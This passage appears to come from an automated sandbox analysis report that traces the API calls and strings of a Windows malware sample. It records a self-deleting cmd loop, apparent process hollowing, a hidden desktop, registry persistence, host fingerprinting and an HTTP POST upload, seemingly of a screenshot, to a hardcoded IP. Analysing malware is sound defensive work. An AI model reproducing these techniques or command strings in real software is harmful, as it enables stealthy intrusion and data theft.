      • Part of subcall function 004013C0: RtlGetLastWin32Error.NTDLL ref: 00401426
      • Part of subcall function 004013C0: memset.NTDLL(?,00000000), ref: 00401462
      • Part of subcall function 004013C0: DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0040148B
      • Part of subcall function 004013C0: RtlGetLastWin32Error.NTDLL ref: 00401495
      • Part of subcall function 004013C0: CloseHandle.KERNEL32 ref: 0040149E
      • Part of subcall function 004013C0: CloseHandle.KERNEL32 ref: 004014E1
      • Part of subcall function 004013C0: CloseHandle.KERNEL32 ref: 00401507
    • lstrlen.KERNEL32(?), ref: 00401B9D
    • CharUpperBuffA.USER32(?), ref: 00401BA5
    • lstrlen.KERNEL32(?), ref: 00401BAF
    • CharUpperBuffA.USER32(?), ref: 00401BBA
    • strstr.NTDLL(?), ref: 00401BC6
    • strstr.NTDLL(?), ref: 00401BE0
    • strstr.NTDLL(?), ref: 00401BFA
    • strstr.NTDLL(?), ref: 00401C14
    • strstr.NTDLL(?), ref: 00401C2E
    • strstr.NTDLL(?), ref: 00401C48
    • strstr.NTDLL(?), ref: 00401C65
    • strstr.NTDLL(?), ref: 00401C82
    • GetModuleHandleA.KERNEL32(00000000), ref: 00401CBF
    • GetModuleFileNameA.KERNEL32 ref: 00401CC6
    • lstrlen.KERNEL32(?), ref: 00401CD8
    • CharUpperBuffA.USER32(?), ref: 00401CE3
    • strstr.NTDLL(?), ref: 00401CF2
    • strstr.NTDLL(?), ref: 00401D0B
    • strstr.NTDLL(?), ref: 00401D24
    Strings
    Function 00401080, Relevance: 16.2, APIs: 6, Strings: 6, Instructions: 39
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00401092
    • GetModuleFileNameA.KERNEL32 ref: 00401099
    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004010A8
    • _snprintf.NTDLL ref: 004010C7
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 004010DE
    • ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 004010F9
    Strings
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs: 004010B5
    • ComSpec, xrefs: 004010D9
    Function 00919620, Relevance: 10.2, APIs: 3, Strings: 3, Instructions: 39
    APIs
    • GetProcAddress.KERNEL32(?,LoadLibraryExA), ref: 00919648
    • LoadLibraryExA.KERNEL32(kernel32.dll,00000000,00000000), ref: 0091965C
    • GetProcAddress.KERNEL32(?), ref: 0091968C
    Strings
    Function 00401270, Relevance: 9.2, APIs: 5, Instructions: 136
    APIs
    Function 009194E0, Relevance: 9.0, APIs: 6, Instructions: 47
    APIs
    • CreateFileA.KERNEL32(0091A040,40000000,00000003,00000000,00000004,00000080,00000000), ref: 009194FD
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 00919518
    • lstrlen.KERNEL32(000000FF), ref: 00919528
    • WriteFile.KERNEL32(000000FF,000000FF), ref: 00919537
    • WriteFile.KERNEL32(000000FF,00900300,00000001,?,00000000), ref: 0091954E
    • CloseHandle.KERNEL32(000000FF), ref: 00919558
    Function 00919DD0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135
    APIs
      • Part of subcall function 00919620: GetProcAddress.KERNEL32(?,LoadLibraryExA), ref: 00919648
      • Part of subcall function 00919620: LoadLibraryExA.KERNEL32(kernel32.dll,00000000,00000000), ref: 0091965C
      • Part of subcall function 00919620: GetProcAddress.KERNEL32(?), ref: 0091968C
    • GetModuleHandleA.KERNEL32(00000000), ref: 00919E4D
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00919E8D
      • Part of subcall function 00919DB0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919DC0
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919B5F
      • Part of subcall function 00919B20: UnmapViewOfFile.KERNEL32(00400000), ref: 00919C11
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00919C32
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C4C
      • Part of subcall function 00919B20: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00919C6D
      • Part of subcall function 00919B20: VirtualProtect.KERNEL32(00000000,00000006,00000040,?), ref: 00919D89
    Strings
    Function 009194B0, Relevance: 5.3, APIs: 2, Strings: 2, Instructions: 10
    APIs
    • GetTempPathA.KERNEL32(00000104,0091A040), ref: 009194BD
    • lstrcat.KERNEL32(0091A040,\__t34t), ref: 009194CD
    Strings
    Function 00401E00, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 21
    APIs
    • GetModuleHandleA.KERNEL32(00404004), ref: 00401E17
    Strings
    • RtlGetCompressionWorkSpaceSize, xrefs: 00401E00
    Function 004024AD, Relevance: 1.7, APIs: 1, Instructions: 195
    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?), ref: 0040255E
    Function 00402398, Relevance: 1.5, APIs: 1, Instructions: 18
    APIs
    • RtlUnwind.NTDLL(004022FD,004023B0,00000000,00000000,?,?,?,?,?,004022FD), ref: 004023AB

    Analysis Process: svchost.exe PID: 576 Parent PID: 1324

    Executed Functions
    Function 00413440, Relevance: 31.8, APIs: 13, Strings: 13, Instructions: 65
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00413444
    • GetThreadDesktop.USER32 ref: 0041344B
    • OpenInputDesktop.USER32(00000000,00000000,00000100), ref: 0041345E
    • CreateDesktopA.USER32(ksnAAbF5z6QDY5hrrDAZb3n,00000000,00000000,00000000,10000000,00000000), ref: 0041347A
    • RtlGetLastWin32Error.NTDLL ref: 00413486
    • SetThreadDesktop.USER32 ref: 0041349B
    • SwitchDesktop.USER32 ref: 004134A4
    • CreateThread.KERNEL32(00000000,00000000,00412AB0), ref: 004134B7
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004134C6
    • CloseHandle.KERNEL32 ref: 004134CD
    • SwitchDesktop.USER32(?), ref: 004134D8
    • SetThreadDesktop.USER32(?), ref: 004134DF
    • CloseDesktop.USER32 ref: 004134E2
    Strings
    • ksnAAbF5z6QDY5hrrDAZb3n, xrefs: 00413471
    Function 00401410, Relevance: 12.5, APIs: 6, Instructions: 65
    APIs
      • Part of subcall function 00401320: GetModuleHandleW.KERNEL32(00000000), ref: 00401337
      • Part of subcall function 00401320: strncpy.NTDLL(?,?), ref: 00401364
      • Part of subcall function 00401320: lstrlen.KERNEL32(?), ref: 00401371
      • Part of subcall function 00401320: strrchr.NTDLL(?,0000005C), ref: 00401381
      • Part of subcall function 00401320: GetVersionExW.KERNEL32(?), ref: 004013A2
      • Part of subcall function 00401320: SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 004013C6
      • Part of subcall function 00401320: RtlGetLastWin32Error.NTDLL ref: 004013D0
      • Part of subcall function 00401320: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004013ED
      • Part of subcall function 00401320: lstrcat.KERNEL32(?,00419500), ref: 004013FF
      • Part of subcall function 00401320: lstrcat.KERNEL32(?,?), ref: 00401403
    • GetVersionExW.KERNEL32(?), ref: 00401444
    • SHDeleteKeyA.SHLWAPI(80000001), ref: 0040147A
    • SHDeleteKeyA.SHLWAPI(80000002), ref: 0040148D
    • CopyFileA.KERNEL32(?,?,00000000), ref: 004014A9
    • lstrcmpi.KERNEL32(?), ref: 004014BB
      • Part of subcall function 00401190: RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 004011CF
      • Part of subcall function 00401190: lstrlen.KERNEL32(?), ref: 004011DC
      • Part of subcall function 00401190: RegSetValueExA.ADVAPI32(?,Update,?,00000001,?), ref: 004011F1
      • Part of subcall function 00401190: RegCloseKey.ADVAPI32(?), ref: 004011FA
      • Part of subcall function 00401220: RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 0040125F
      • Part of subcall function 00401220: RegDeleteValueA.ADVAPI32(?,Update), ref: 0040127F
      • Part of subcall function 00401220: RegCloseKey.ADVAPI32(?), ref: 0040128A
      • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019), ref: 004012C4
      • Part of subcall function 004012A0: RegDeleteValueA.ADVAPI32 ref: 004012E5
      • Part of subcall function 004012A0: RegDeleteValueA.ADVAPI32(00000000), ref: 004012F8
      • Part of subcall function 004012A0: RegDeleteValueA.ADVAPI32(00000000), ref: 0040130A
      • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(00000000), ref: 00401311
    • DeleteFileA.KERNEL32 ref: 004014EC
      • Part of subcall function 004010C0: GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
      • Part of subcall function 004010C0: strncpy.NTDLL(?,?), ref: 00401106
      • Part of subcall function 004010C0: lstrlen.KERNEL32(?), ref: 00401116
      • Part of subcall function 004010C0: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
      • Part of subcall function 004010C0: _snprintf.NTDLL ref: 00401145
      • Part of subcall function 004010C0: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
      • Part of subcall function 004010C0: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    Function 004150B0, Relevance: 73.0, APIs: 30, Strings: 30, Instructions: 447
    APIs
    • GetTickCount.KERNEL32 ref: 004150D0
    • LocalAlloc.KERNEL32(00000000), ref: 004150F5
    • RtlGetLastWin32Error.NTDLL ref: 004150FF
    • memcpy.NTDLL(?,?,?,?,?,7C80AC61,?,7C80BE56), ref: 00415113
    • closesocket.WS2_32 ref: 0041558E
      • Part of subcall function 00413930: memset.NTDLL(?,00000000), ref: 00413942
      • Part of subcall function 00413930: GetCurrentHwProfileW.ADVAPI32 ref: 0041394E
    • _snprintf.NTDLL ref: 00415155
      • Part of subcall function 00414CB0: _alldiv.NTDLL ref: 00414CC6
    • LocalAlloc.KERNEL32(00000000), ref: 00415185
    • memset.NTDLL(?,00000000), ref: 0041519B
    • LocalAlloc.KERNEL32(00000000,00008000), ref: 004151B2
    • memset.NTDLL(?,00000000), ref: 004151CA
    • LocalAlloc.KERNEL32(00000000), ref: 004151DE
    • memset.NTDLL(?,00000000), ref: 004151F0
      • Part of subcall function 00414D30: memset.NTDLL(?,0000003D), ref: 00414EBD
    • socket.WS2_32(00000002,00000001,00000006), ref: 00415254
    • htons.WS2_32(00000050), ref: 0041528B
    • gethostbyname.WS2_32(?), ref: 0041529E
    • memcpy.NTDLL(?), ref: 004152B8
    • connect.WS2_32(?,?,00000010), ref: 004152C8
    • inet_addr.WS2_32(?), ref: 004152DC
    • _snprintf.NTDLL ref: 00415310
    • _snprintf.NTDLL ref: 0041532D
    • _snprintf.NTDLL ref: 00415379
    • send.WS2_32(?,?,?,00000000), ref: 0041544E
    • memset.NTDLL(?,00000000), ref: 00415464
    • recv.WS2_32(?,?,00008000,00000000), ref: 00415480
    • recv.WS2_32(?,?,00008000,00000000), ref: 00415499
      • Part of subcall function 004125A0: lstrcmp.KERNEL32 ref: 004125DD
    • strstr.NTDLL ref: 004154DA
      • Part of subcall function 00414FF0: LocalAlloc.KERNEL32(00000000), ref: 00414FFD
      • Part of subcall function 00414FF0: memset.NTDLL(?,00000000), ref: 0041501B
      • Part of subcall function 00414FF0: LocalFree.KERNEL32 ref: 00415042
      • Part of subcall function 00414FF0: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,71AB676F), ref: 0041508F
      • Part of subcall function 00414FF0: LocalFree.KERNEL32 ref: 00415098
    • LocalFree.KERNEL32(?), ref: 00415564
    • LocalFree.KERNEL32 ref: 0041556F
    • LocalFree.KERNEL32(?), ref: 0041557E
    • LocalFree.KERNEL32(?), ref: 00415599
    Strings
    • %lu, xrefs: 00415143
    • --%uContent-Disposition: form-data; name="data"; filename="%s"Content-Type: application/octet-stream, xrefs: 00415305
    • --%d--, xrefs: 00415321
    • POST /%s HTTP/1.1Content-Type: multipart/form-data; boundary=%uHost: %sConnection: closeCache-Control: no-cacheContent-Length: %ld, xrefs: 00415372
    • HTTP/1.1 200, xrefs: 0041549F
    • , xrefs: 004154D4
    Function 00412780, Relevance: 60.5, APIs: 24, Strings: 24, Instructions: 273
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00412797
    • strncpy.NTDLL(?,?), ref: 004127C7
    • lstrlen.KERNEL32(?), ref: 004127D4
    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 004127F2
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
      • Part of subcall function 004010C0: GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
      • Part of subcall function 004010C0: strncpy.NTDLL(?,?), ref: 00401106
      • Part of subcall function 004010C0: lstrlen.KERNEL32(?), ref: 00401116
      • Part of subcall function 004010C0: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
      • Part of subcall function 004010C0: _snprintf.NTDLL ref: 00401145
      • Part of subcall function 004010C0: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
      • Part of subcall function 004010C0: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    • ExitProcess.KERNEL32(00000661), ref: 0041281D
    • WSAStartup.WS2_32(00000202,?), ref: 00412830
    • RtlGetLastWin32Error.NTDLL ref: 00412839
      • Part of subcall function 00401940: VirtualAlloc.KERNEL32(00000000,0000EB59,00001000,00000004), ref: 00401970
      • Part of subcall function 00401940: VirtualAlloc.KERNEL32(00000000,01010008,00001000,00000004), ref: 004019E4
      • Part of subcall function 00401940: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A18
      • Part of subcall function 00401940: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A48
      • Part of subcall function 00401940: VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401A52
    • OleUninitialize.OLE32 ref: 00412A88
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    • ExitProcess.KERNEL32(00000663), ref: 00412887
      • Part of subcall function 004107C0: GetSystemTime.KERNEL32(?), ref: 004107D0
      • Part of subcall function 004107C0: SystemTimeToFileTime.KERNEL32(?,?), ref: 004107E0
      • Part of subcall function 004107C0: RtlTimeToSecondsSince1970.NTDLL ref: 004107F8
    • SetTimer.USER32(00000000,00000000,0000000A,00413B80), ref: 004128B2
    • RtlGetLastWin32Error.NTDLL ref: 004128C2
    • ExitProcess.KERNEL32(00000001), ref: 004128D7
      • Part of subcall function 00410BB0: strncmp.NTDLL(Anonymous Proxy, , ), ref: 00410CF3
      • Part of subcall function 00410BB0: GetProcessHeap.KERNEL32 ref: 00410D84
      • Part of subcall function 00410BB0: RtlFreeHeap.NTDLL ref: 00410D8B
      • Part of subcall function 00401410: GetVersionExW.KERNEL32(?), ref: 00401444
      • Part of subcall function 00401410: SHDeleteKeyA.SHLWAPI(80000001), ref: 0040147A
      • Part of subcall function 00401410: SHDeleteKeyA.SHLWAPI(80000002), ref: 0040148D
      • Part of subcall function 00401410: CopyFileA.KERNEL32(?,?,00000000), ref: 004014A9
      • Part of subcall function 00401410: lstrcmpi.KERNEL32(?), ref: 004014BB
      • Part of subcall function 00401410: DeleteFileA.KERNEL32 ref: 004014EC
    • memset.NTDLL(?,00000000), ref: 004128FD
    • GetVersionExW.KERNEL32(?), ref: 00412912
      • Part of subcall function 00413930: memset.NTDLL(?,00000000), ref: 00413942
      • Part of subcall function 00413930: GetCurrentHwProfileW.ADVAPI32 ref: 0041394E
    • GetSystemDefaultLangID.KERNEL32(?,?,00000001), ref: 00412933
    • GetSystemMetrics.USER32(00000000), ref: 00412944
    • GetSystemMetrics.USER32(00000001), ref: 0041294A
      • Part of subcall function 00410E10: _vsnprintf.NTDLL(ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV,000003FF,?,?,?,7E418F9C,00412995,?,00000000,00000000,00000000,00000003,000018E1,?,83868CF7), ref: 00410E3A
    • RtlGetLastWin32Error.NTDLL ref: 0041299C
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 00412677
      • Part of subcall function 00412660: RtlAllocateHeap.NTDLL(?,?,7E418F9C), ref: 0041267A
      • Part of subcall function 00412660: memset.NTDLL(?,00000000), ref: 0041268E
      • Part of subcall function 00412660: ExitProcess.KERNEL32(00001B8B), ref: 004126B6
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 004126E9
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 004126EC
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412715
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412737
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412759
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 0041276A
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 00412771
    • GetModuleHandleW.KERNEL32(00000000), ref: 004129B8
      • Part of subcall function 00418310: OleInitialize.OLE32(00000000), ref: 00418315
      • Part of subcall function 00418310: LoadCursorW.USER32 ref: 0041835D
      • Part of subcall function 00418310: RegisterClassW.USER32 ref: 0041837F
    • LocalAlloc.KERNEL32(00000040,000000D4), ref: 004129DA
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 004129F9
    • GetSystemMetrics.USER32(00000000), ref: 00412A0C
    • GetSystemMetrics.USER32(00000001), ref: 00412A12
      • Part of subcall function 004183A0: DestroyWindow.USER32(00000008), ref: 004183BD
      • Part of subcall function 004183A0: CreateWindowExW.USER32 ref: 00418406
      • Part of subcall function 004183A0: RtlGetLastWin32Error.NTDLL ref: 00418418
      • Part of subcall function 00418430: GetWindow.USER32(00000008,00000004), ref: 00418448
      • Part of subcall function 00418430: EnableWindow.USER32(?,00000000), ref: 00418458
      • Part of subcall function 00418430: GetMessageW.USER32(00000008,00000005), ref: 0041846F
      • Part of subcall function 00418430: KiUserApcDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0041848B
      • Part of subcall function 00418430: TranslateMessage.USER32(?), ref: 004184AD
      • Part of subcall function 00418430: DispatchMessageW.USER32(?), ref: 004184B8
      • Part of subcall function 00418430: EnableWindow.USER32(?,00000001), ref: 004184C7
      • Part of subcall function 00412BC0: LocalFree.KERNEL32 ref: 00412BE3
    • UnregisterClassW.USER32(59FFB769-5787-4181-A4F0-949BF67A7793,00400000), ref: 00412A82
    Strings
    • QnY8EHt, xrefs: 004127A2
    • FiberMax Networks BV, xrefs: 00412952
    • Anonymous Proxy, xrefs: 00412957
    • 178.18.17.204, xrefs: 0041295C
    • ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV, xrefs: 0041298B
    • 59FFB769-5787-4181-A4F0-949BF67A7793, xrefs: 00412A7D
    Function 00414200, Relevance: 46.6, APIs: 16, Strings: 16, Instructions: 411
    APIs
    • CoCreateInstance.OLE32(00419288,00000000,00000001,0041988C,p~7), ref: 00414221
    • CoCreateInstance.OLE32(00419278,00000000,00000001,004192E8,0041BA90), ref: 00414242
    • CoCreateInstance.OLE32(00419298,00000000,00000001,0041993C,0041BA7C), ref: 00414284
    • CoCreateInstance.OLE32(0041986C,00000000,00000001,0041989C,0041BA98), ref: 00414381
    • memset.NTDLL(?,00000000), ref: 004143D7
    • CoCreateInstance.OLE32(0041987C,00000000,00000001,0041989C,0041BAA0), ref: 00414484
      • Part of subcall function 00414120: GetProcessHeap.KERNEL32 ref: 0041412C
      • Part of subcall function 00414120: RtlFreeHeap.NTDLL ref: 00414133
    • GetProcessHeap.KERNEL32 ref: 0041457E
    • RtlAllocateHeap.NTDLL ref: 00414585
    • RtlGetLastWin32Error.NTDLL ref: 00414594
    • CreateFileW.KERNEL32(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00414659
    • RtlGetLastWin32Error.NTDLL ref: 00414666
    • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 004146A3
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004146B2
    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004146C8
    • CloseHandle.KERNEL32 ref: 004146CB
    • CoTaskMemFree.OLE32(?), ref: 004146DC
    Strings
    Function 00413500, Relevance: 38.3, APIs: 18, Strings: 18, Instructions: 133
    APIs
    • GetProcessHeap.KERNEL32 ref: 00413528
    • RtlAllocateHeap.NTDLL(?,?,7C90FE21), ref: 0041352B
    • InternetOpenA.WININET(Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0),00000001,00000000,00000000,00000000), ref: 0041354D
    • InternetOpenUrlA.WININET(?,?,00000000,00000000,04080000,00000000), ref: 0041356C
    • RtlGetLastWin32Error.NTDLL ref: 0041357A
    • GetProcessHeap.KERNEL32 ref: 00413583
    • RtlFreeHeap.NTDLL ref: 00413586
    • GetProcessHeap.KERNEL32 ref: 004135A5
    • RtlAllocateHeap.NTDLL(?,?,?), ref: 004135A8
    • InternetReadFile.WININET(00000000,?,00010000,?), ref: 004135CD
    • GetProcessHeap.KERNEL32 ref: 004135F3
    • RtlReAllocateHeap.NTDLL(?,?,00040000), ref: 004135F6
    • memcpy.NTDLL(?,?,?,?,00010000,?,?,?,?), ref: 00413613
    • InternetReadFile.WININET(?,?,00010000,?), ref: 0041363F
    • InternetCloseHandle.WININET(00000000), ref: 00413654
    • InternetCloseHandle.WININET(?), ref: 00413663
    • GetProcessHeap.KERNEL32 ref: 0041366C
    • RtlFreeHeap.NTDLL ref: 0041366F
    Strings
    • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0), xrefs: 00413548
    Function 00411720, Relevance: 37.9, APIs: 17, Strings: 17, Instructions: 1168
    APIs
    Strings
    Function 00410830, Relevance: 36.7, APIs: 14, Strings: 14, Instructions: 139
    APIs
    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000), ref: 00410871
    • lstrlen.KERNEL32(178.18.17.204), ref: 0041088A
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410894
    • lstrlen.KERNEL32(178.18.17.204), ref: 004108C2
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004108E5
    • lstrlen.KERNEL32(Anonymous Proxy), ref: 004108F6
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410900
    • lstrlen.KERNEL32(Anonymous Proxy), ref: 0041092E
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 0041094C
    • lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410959
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410963
    • lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410991
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004109AF
    • RegCloseKey.ADVAPI32(?), ref: 004109B8
    Strings
    Function 00401000, Relevance: 31.6, APIs: 13, Strings: 13, Instructions: 75
    APIs
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
      • Part of subcall function 004010C0: GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
      • Part of subcall function 004010C0: strncpy.NTDLL(?,?), ref: 00401106
      • Part of subcall function 004010C0: lstrlen.KERNEL32(?), ref: 00401116
      • Part of subcall function 004010C0: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
      • Part of subcall function 004010C0: _snprintf.NTDLL ref: 00401145
      • Part of subcall function 004010C0: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
      • Part of subcall function 004010C0: ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    • ExitProcess.KERNEL32(00000661), ref: 00401025
    • SetWindowPos.USER32(00000000,Program Manager), ref: 0040104B
    • SetWindowPos.USER32 ref: 00401054
    • ShowWindow.USER32(Shell_TrayWnd,00000000), ref: 0040105D
    • ShowWindow.USER32(?,00000000), ref: 0040106E
    • UpdateWindow.USER32 ref: 00401071
      • Part of subcall function 00413440: GetCurrentThreadId.KERNEL32 ref: 00413444
      • Part of subcall function 00413440: GetThreadDesktop.USER32 ref: 0041344B
      • Part of subcall function 00413440: OpenInputDesktop.USER32(00000000,00000000,00000100), ref: 0041345E
      • Part of subcall function 00413440: CreateDesktopA.USER32(ksnAAbF5z6QDY5hrrDAZb3n,00000000,00000000,00000000,10000000,00000000), ref: 0041347A
      • Part of subcall function 00413440: RtlGetLastWin32Error.NTDLL ref: 00413486
      • Part of subcall function 00413440: SetThreadDesktop.USER32 ref: 0041349B
      • Part of subcall function 00413440: SwitchDesktop.USER32 ref: 004134A4
      • Part of subcall function 00413440: CreateThread.KERNEL32(00000000,00000000,00412AB0), ref: 004134B7
      • Part of subcall function 00413440: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004134C6
      • Part of subcall function 00413440: CloseHandle.KERNEL32 ref: 004134CD
      • Part of subcall function 00413440: SwitchDesktop.USER32(?), ref: 004134D8
      • Part of subcall function 00413440: SetThreadDesktop.USER32(?), ref: 004134DF
      • Part of subcall function 00413440: CloseDesktop.USER32 ref: 004134E2
    • FindWindowA.USER32(00000000,Program Manager), ref: 0040108F
    • SetWindowPos.USER32(?,?,?,00000000), ref: 00401092
    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040109B
    • ShowWindow.USER32(?,00000005), ref: 004010A6
    • UpdateWindow.USER32 ref: 004010A9
    • ExitProcess.KERNEL32(00000000), ref: 004010B1
